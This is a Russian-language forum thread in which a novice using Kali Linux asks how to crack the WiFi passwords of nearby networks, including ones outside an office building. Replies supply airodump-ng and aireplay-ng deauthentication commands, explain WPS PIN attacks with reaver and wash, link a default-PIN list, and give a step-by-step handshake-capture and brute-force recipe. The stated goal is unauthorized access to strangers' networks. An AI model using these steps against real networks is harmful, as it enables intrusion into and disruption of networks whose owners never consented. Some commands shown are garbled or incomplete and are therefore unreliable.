![]() |
Добрый вечер.
В первые пробую взломать пороль WiFi, установил ОС Kali Linux, работаю на ноутбуке от Lenovo G50-30. Прочитал статью по ссылке (тоже на этом форуме), и много других. Что я делал: - подключил WiFi адаптер Alfa AWUS036H. - переключил в режим мониторинга: [CODE] Code: root@kali-Linux:~# airodump-ng mon0 CH 3 ][ Elapsed: 4 s ][ 2015-05-11 19:29 BSSID PWR Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID BC:F6:85:BF:C0:E6 -59 2 0 0 4 54e WPA CCMP PSK Kira- 10:BF:48:E6:55:18 -70 4 0 0 6 54e WPA2 CCMP PSK Roofl B0:B2:DC:DC:C5:59 -63 3 0 0 8 54e WPA2 CCMP PSK Archi D4:21:22:53:CE:65 -76 6 0 0 8 54e WPA2 CCMP PSK MGTS_ B0:B2:DC:DC:C5:58 -67 11 0 0 8 54e WPA2 CCMP PSK Archi 60:A4:4C:DE:45:48 -74 2 0 0 4 54e WPA2 CCMP PSK ASUS C0:C1:C0:48:76:8F -74 2 0 0 2 54e. WPA2 CCMP PSK Alati 60:A4:4C:A2:B7:F8 -65 2 0 0 13 54e WPA2 CCMP PSK TAGNA 00:14:D1:A5:4A:95 -67 2 0 0 11 54e. WPA2 CCMP PSK SPIDE D8:50:E6:D7:39:60 -67 12 3 0 6 54e WPA2 CCMP PSK Anako 00:22:15:71:2A:E5 -59 20 3 0 6 54 WPA TKIP PSK WL520 00:1C:F0:3B:C3:05 -66 18 4 1 6 54 . WPA TKIP PSK dlink C4:6E:1F:D5:AE:8A -71 2 0 0 6 54e. WPA2 CCMP PSK TP-LI 90:E6:BA:F1:6C:30 -57 3 2 0 6 54 WPA2 CCMP PSK proje 00:25:9C:F7:36:85 -53 21 0 0 9 54e. WPA2 CCMP PSK Port D4:21:22:99:45:61 -75 3 0 0 1 54e WPA2 CCMP PSK MGTS_ 00:17:9A:84:FD:45 -71 3 0 0 3 54 . WPA2 CCMP PSK 2b4A9 C2:9F:DB:F7:43:B4 -69 0 3 0 1 -1 OPN |
Цитата:
Может видео поможет.. |
на английском возможно, что много пропустил, так как не владею английским на 100%. Поэтому очень даже может быть.
А видео я почти не смотрел, спасибо |
Цитата:
|
Цитата:
А reaver - это другое кино... REAVER это утилита для перебора ПИНов когда роутер уязвим по протоколу WPS(WIireless Protected Setup).Здесь как раз таки handshake не нужен.В вардрайвинге есть такой приоритет взлома,что если есть WPS то сначала ломается он а аж потом брут если первый этап не даст результатов так как WPS ломается быстрее и проще.А прежде чем ломать WPS стоит проверить наличия ПИНа от роутера на наличие в списке стандартных пинов http://k0derz.ru/база-wps-pin-кодов/. Проверить есть ли на роутере WPS можно утилитой wash в Kali Linux на пример так: Код:
Code: |
Цитата:
|
Цитата:
|
Вот сегодня вышел "прогуляться" и около офисного здания попробовал снова, что получится:
Код:
Code:Каким образом aireplay-ng будет отключать клиентов, если он их даже не видет, или besside-ng, получается без клиентов у меня нет шансов взломать пороль WiFi? |
Цитата:
|
Цитата:
|
Одного клиента спустя 2 дня поиска наконец то обнаружил:
Код:
Code:Код:
Code:Код:
Code: |
Цитата:
Код:
Code:Код:
Code: |
--ignore-negative-one для кого эта строчка?
|
Цитата:
--ignore-negative-one - сам не знаю что такое вот что выдает help к команде aireplay-ng: Код:
Code:Цитата:
|
Цитата:
|
Цитата:
|
Цитата:
Спрашиваю, потому что Вы говорите брутить хендшейк, тогда зачем соединение с роутером, по идее можно его про брутить узнать пороль и просто приходить на то место и подключаться к нему, можно так? Если так, то было б велеколепно я с планшетным ноутбуком по перехватываю хендшейки, а дома с "крутой" быстрой и мощной видеокартой про брутю все хендшейки, а с ноутбуком я 10 лет взламывать буду) |
Цитата:
|
Цитата:
Вы говорили про статью, подскажите, где она. |
Цитата:
|
Цитата:
А понял, где это под моей темой, в списке всех тем, сначала понял в моей теме под ней, поэтому не мог найти |
В той статье опять же сразу есть клиенты а у меня их нет!
Код:
Code:Нет ни кого. И так на всех. |
Цитата:
|
Цитата:
|
Код:
Code: |
что -то ты не то делаешь
|
Цитата:
|
пиши команды которые выполняешь , то что я вижу ты никак не поймаешь его
|
Цитата:
|
Цитата:
|
Цитата:
Не я же диктую линексу что выводить, что я увидел, то я и написал сюда. |
Цитата:
|
|
Цитата:
|
airodump-ng --bssid CC:5D:4EA:11:C8 -c1 -w hachthis mon0 эта команда верная
aireplay-ng --deauth 5 -a 20:CF:306:46B -c 9C:AD:97:4D:37:19 mon0 эта нет Я не увидел где у тебя там клиент есть. ткни меня носов в это. |
Цитата:
|
aireplay-ng --deauth 5 -a 20:CF:306:46B -c 9C:AD:97:4D:37:19 mon0 -- какой результат работы этой команды ? Возможно когда писали мануалы был бак трак
|
Цитата:
Цитата:
|
Цитата:
|
Цитата:
Я делал по такой инструкции: 1. airmon-ng start wlan0 2. airodump-ng mon0 3. airodump-ng -w (name of target) -c (channel) --bssid (target mac address) mon0 4. aireplay-ng wlan0 --deauth 5 -a (mac bssid) -c (mac client) mon0 после этой команды клиент должен отвалится и заново аутонтифицироваться. после последней команды мониторим ситуацию с хендшейком. я с первой попытки выудил 2 хендшейка подряд. позже наудивление сбрутил пассы один за 10 мин, второй за 2.5 часа работы со штатным словарем с инета, скорость перебора составила в районе 11000 паролей в сек. Все работает, нужно понимачть что делаешь. А не просто копировать. честно говоря не помню откуда взял словарик но он меня порадовал. |
| Время: 08:05 |